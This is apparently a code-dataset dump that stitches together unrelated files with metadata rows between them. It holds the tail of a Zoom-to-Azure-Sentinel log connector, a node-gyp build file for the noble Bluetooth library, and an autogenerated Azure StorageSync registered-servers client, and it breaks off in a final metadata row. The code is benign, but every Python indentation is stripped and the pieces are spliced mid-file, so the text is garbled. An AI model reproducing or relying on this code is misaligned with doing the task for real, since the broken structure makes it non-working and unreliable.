'exp': datetime.datetime.now() + datetime.timedelta(hours=self.jwt_token_exp_hours)
}
jwt_token = jwt.encode(payload, self.api_secret)
return jwt_token
def generate_date(self):
current_time_day = datetime.datetime.utcnow().replace(second=0, microsecond=0)
state = StateManager(connection_string)
past_time = state.get()
if past_time is not None:
logging.info("The last time point is: {}".format(past_time))
else:
logging.info("There is no last time point, trying to get events for last week.")
past_time = (current_time_day - datetime.timedelta(days=7)).strftime("%Y-%m-%d")
state.post(current_time_day.strftime("%Y-%m-%d"))
return (past_time, current_time_day.strftime("%Y-%m-%d"))
def get_report(self, report_type_suffix,next_page_token = None):
query_params = {
"page_size": 300,
"from": self.from_day,
"to": self.to_day
}
if next_page_token:
query_params.update({"next_page_token": next_page_token})
try:
r = requests.get(url = self.base_url + report_type_suffix,
params = query_params,
headers = self.headers)
if r.status_code == 200:
return r.json()
elif r.status_code == 400:
logging.error("The requested report cannot be generated for this account because"
" this account has not subscribed to toll-free audio conference plan."
" Error code: {}".format(r.status_code))
elif r.status_code == 401:
logging.error("Invalid access token. Error code: {}".format(r.status_code))
elif r.status_code == 300:
logging.error("Only provide report in recent 6 months. Error code: {}".format(
r.status_code))
else:
logging.error("Something wrong. Error code: {}".format(r.status_code))
except Exception as err:
logging.error("Something wrong. Exception error text: {}".format(err))
class Sentinel:
def __init__(self):
self.logAnalyticsUri = logAnalyticsUri
self.success_processed = 0
self.fail_processed = 0
self.table_name = table_name
self.chunksize = chunksize
def gen_chunks_to_object(self, data, chunksize=100):
chunk = []
for index, line in enumerate(data):
if (index % chunksize == 0 and index > 0):
yield chunk
del chunk[:]
chunk.append(line)
yield chunk
def gen_chunks(self, data):
for chunk in self.gen_chunks_to_object(data, chunksize=self.chunksize):
obj_array = []
for row in chunk:
if row != None and row != '':
obj_array.append(row)
body = json.dumps(obj_array)
self.post_data(body, len(obj_array))
def build_signature(self, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(
hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id, encoded_hash)
return authorization
def post_data(self, body, chunk_count):
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = self.build_signature(rfc1123date, content_length, method, content_type,
resource)
uri = self.logAnalyticsUri + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': self.table_name,
'x-ms-date': rfc1123date
}
response = requests.post(uri, data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
logging.info("Chunk was processed({} events)".format(chunk_count))
self.success_processed = self.success_processed + chunk_count
else:
logging.error("Error during sending events to Azure Sentinel. Response code:{}".format(response.status_code))
self.fail_processed = self.fail_processed + chunk_count
def results_array_join(result_element,api_req_id,api_req_name):
for element in result_element[api_req_id]:
element['event_type'] = api_req_id
element['event_name'] = api_req_name
results_array.append(element)
def get_main_info():
for api_req_id, api_req_info in reports_api_requests_dict.items():
api_req = api_req_info['api_req']
api_req_name = api_req_info['name']
logging.info("Getting report: {}".format(api_req_info['name']))
result = zoom.get_report(report_type_suffix = api_req)
if result is not None:
next_page_token = result.get('next_page_token')
results_array_join(result,api_req_id,api_req_name)
else:
next_page_token = None
while next_page_token:
result = zoom.get_report(report_type_suffix=api_req, next_page_token = next_page_token)
if result is not None:
next_page_token = result.get('next_page_token')
results_array_join(result, api_req_id, api_req_name)
else:
next_page_token = None
def main(mytimer: func.TimerRequest) -> None:
utc_timestamp = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Python timer trigger function ran at %s', utc_timestamp)
logging.info('Starting program')
global results_array, reports_api_requests_dict, zoom
reports_api_requests_dict = \
{
"dates": {"api_req": "/report/daily", "name": "Daily Usage Reports."},
"users": {"api_req": "/report/users", "name": "Active/Inactive Host Reports."},
"telephony_usage": {"api_req": "/report/telephone", "name": "Telephone Reports."},
"cloud_recording_storage": {"api_req": "/report/cloud_recording", "name": "Cloud Recording Usage Reports."},
"operation_logs": {"api_req": "/report/operationlogs", "name": "Operation Logs Report."},
"activity_logs": {"api_req": "/report/activities", "name": "Sign In/Sign Out Activity Report."}
}
results_array = []
zoom = Zoom()
sentinel = Sentinel()
zoom_class_vars = vars(zoom)
from_day, to_day = zoom_class_vars['from_day'], zoom_class_vars['to_day']
logging.info('Trying to get events for period: {} - {}'.format(from_day, to_day))
get_main_info()
sentinel.gen_chunks(results_array)
sentinel_class_vars = vars(sentinel)
success_processed, fail_processed = sentinel_class_vars["success_processed"],\
sentinel_class_vars["fail_processed"]
logging.info('Total events processed successfully: {}, failed: {}. Period: {} - {}'
.format(success_processed, fail_processed, from_day, to_day))
| 44.52381
| 122
| 0.607059
|
d565b0605e7c547850eea95409bf1708c77d968c
| 858
|
gyp
|
Python
|
lib/mac/binding.gyp
|
abiatarnt/noble
|
d9c4748e3d2220c807e33a624b2b719c8d76228d
|
[
"MIT"
] | 2
|
2021-09-24T13:51:09.000Z
|
2021-09-24T14:08:36.000Z
|
lib/mac/binding.gyp
|
stoprocent/noble
|
ff82ecd83978d8be155ce00e36e72fd6f91ca882
|
[
"MIT"
] | 1
|
2021-09-28T09:08:15.000Z
|
2021-09-28T09:08:15.000Z
|
lib/mac/binding.gyp
|
stoprocent/noble
|
ff82ecd83978d8be155ce00e36e72fd6f91ca882
|
[
"MIT"
] | 1
|
2021-09-24T14:05:29.000Z
|
2021-09-24T14:05:29.000Z
|
{
'targets': [
{
'target_name': 'binding',
'sources': [ 'src/noble_mac.mm', 'src/napi_objc.mm', 'src/ble_manager.mm', 'src/objc_cpp.mm', 'src/callbacks.cc' ],
'include_dirs': ["<!@(node -p \"require('node-addon-api').include\")"],
'dependencies': ["<!(node -p \"require('node-addon-api').gyp\")"],
'cflags!': [ '-fno-exceptions' ],
'cflags_cc!': [ '-fno-exceptions' ],
'xcode_settings': {
'GCC_ENABLE_CPP_EXCEPTIONS': 'YES',
'CLANG_CXX_LIBRARY': 'libc++',
'MACOSX_DEPLOYMENT_TARGET': '10.7',
'OTHER_CFLAGS': [
'-fobjc-arc',
],
},
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/CoreBluetooth.framework',
]
},
'product_dir': '../lib/mac/native',
}
]
}
| 31.777778
| 123
| 0.504662
|
645f0d632772e7027a2bc622b80488e9356b74e0
| 32,198
|
py
|
Python
|
sdk/storage/azure-mgmt-storagesync/azure/mgmt/storagesync/aio/operations/_registered_servers_operations.py
|
mohamedshabanofficial/azure-sdk-for-python
|
81c585f310cd2ec23d2ad145173958914a075a58
|
[
"MIT"
] | 2
|
2021-03-24T06:26:11.000Z
|
2021-04-18T15:55:59.000Z
|
sdk/storage/azure-mgmt-storagesync/azure/mgmt/storagesync/aio/operations/_registered_servers_operations.py
|
mohamedshabanofficial/azure-sdk-for-python
|
81c585f310cd2ec23d2ad145173958914a075a58
|
[
"MIT"
] | 2
|
2021-11-03T06:10:36.000Z
|
2021-12-01T06:29:39.000Z
|
sdk/storage/azure-mgmt-storagesync/azure/mgmt/storagesync/aio/operations/_registered_servers_operations.py
|
mohamedshabanofficial/azure-sdk-for-python
|
81c585f310cd2ec23d2ad145173958914a075a58
|
[
"MIT"
] | 1
|
2021-05-19T02:55:10.000Z
|
2021-05-19T02:55:10.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RegisteredServersOperations:
"""RegisteredServersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storagesync.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_storage_sync_service(
self,
resource_group_name: str,
storage_sync_service_name: str,
**kwargs
) -> AsyncIterable["_models.RegisteredServerArray"]:
"""Get a given registered server list.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param storage_sync_service_name: Name of Storage Sync Service resource.
:type storage_sync_service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either RegisteredServerArray or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.storagesync.models.RegisteredServerArray]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RegisteredServerArray"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_storage_sync_service.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('RegisteredServerArray', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.StorageSyncError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_storage_sync_service.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers'} # type: ignore
async def get(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
**kwargs
) -> "_models.RegisteredServer":
"""Get a given registered server.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param storage_sync_service_name: Name of Storage Sync Service resource.
:type storage_sync_service_name: str
:param server_id: GUID identifying the on-premises server.
:type server_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegisteredServer, or the result of cls(response)
:rtype: ~azure.mgmt.storagesync.models.RegisteredServer
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RegisteredServer"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageSyncError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
deserialized = self._deserialize('RegisteredServer', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}'} # type: ignore
async def _create_initial(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
parameters: "_models.RegisteredServerCreateParameters",
**kwargs
) -> Optional["_models.RegisteredServer"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.RegisteredServer"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'RegisteredServerCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageSyncError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
deserialized = None
if response.status_code == 200:
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
deserialized = self._deserialize('RegisteredServer', pipeline_response)
if response.status_code == 202:
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
response_headers['Location']=self._deserialize('str', response.headers.get('Location'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_create_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}'} # type: ignore
async def begin_create(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
parameters: "_models.RegisteredServerCreateParameters",
**kwargs
) -> AsyncLROPoller["_models.RegisteredServer"]:
"""Add a new registered server.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param storage_sync_service_name: Name of Storage Sync Service resource.
:type storage_sync_service_name: str
:param server_id: GUID identifying the on-premises server.
:type server_id: str
:param parameters: Body of Registered Server object.
:type parameters: ~azure.mgmt.storagesync.models.RegisteredServerCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either RegisteredServer or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.storagesync.models.RegisteredServer]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.RegisteredServer"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_initial(
resource_group_name=resource_group_name,
storage_sync_service_name=storage_sync_service_name,
server_id=server_id,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
response_headers = {}
response = pipeline_response.http_response
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
deserialized = self._deserialize('RegisteredServer', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageSyncError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
if response.status_code == 200:
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
if response.status_code == 202:
response_headers['Location']=self._deserialize('str', response.headers.get('Location'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
if cls:
return cls(pipeline_response, None, response_headers)
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Delete the given registered server.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param storage_sync_service_name: Name of Storage Sync Service resource.
:type storage_sync_service_name: str
:param server_id: GUID identifying the on-premises server.
:type server_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
storage_sync_service_name=storage_sync_service_name,
server_id=server_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}'} # type: ignore
async def _trigger_rollover_initial(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
parameters: "_models.TriggerRolloverRequest",
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._trigger_rollover_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TriggerRolloverRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageSyncError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
if response.status_code == 200:
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
if response.status_code == 202:
response_headers['Location']=self._deserialize('str', response.headers.get('Location'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
if cls:
return cls(pipeline_response, None, response_headers)
_trigger_rollover_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}/triggerRollover'} # type: ignore
async def begin_trigger_rollover(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
parameters: "_models.TriggerRolloverRequest",
**kwargs
) -> AsyncLROPoller[None]:
"""Triggers Server certificate rollover.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param storage_sync_service_name: Name of Storage Sync Service resource.
:type storage_sync_service_name: str
:param server_id: Server Id.
:type server_id: str
:param parameters: Body of Trigger Rollover request.
:type parameters: ~azure.mgmt.storagesync.models.TriggerRolloverRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._trigger_rollover_initial(
resource_group_name=resource_group_name,
storage_sync_service_name=storage_sync_service_name,
server_id=server_id,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_trigger_rollover.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}/triggerRollover'} # type: ignore
| 54.114286
| 256
| 0.677775
|
a1c9182828de1979359bb4726296393b868639a7
| 1,243
|
py
|
Python
|
aiozoom/components/recording.py
|
vladisa88/aiozoom
|
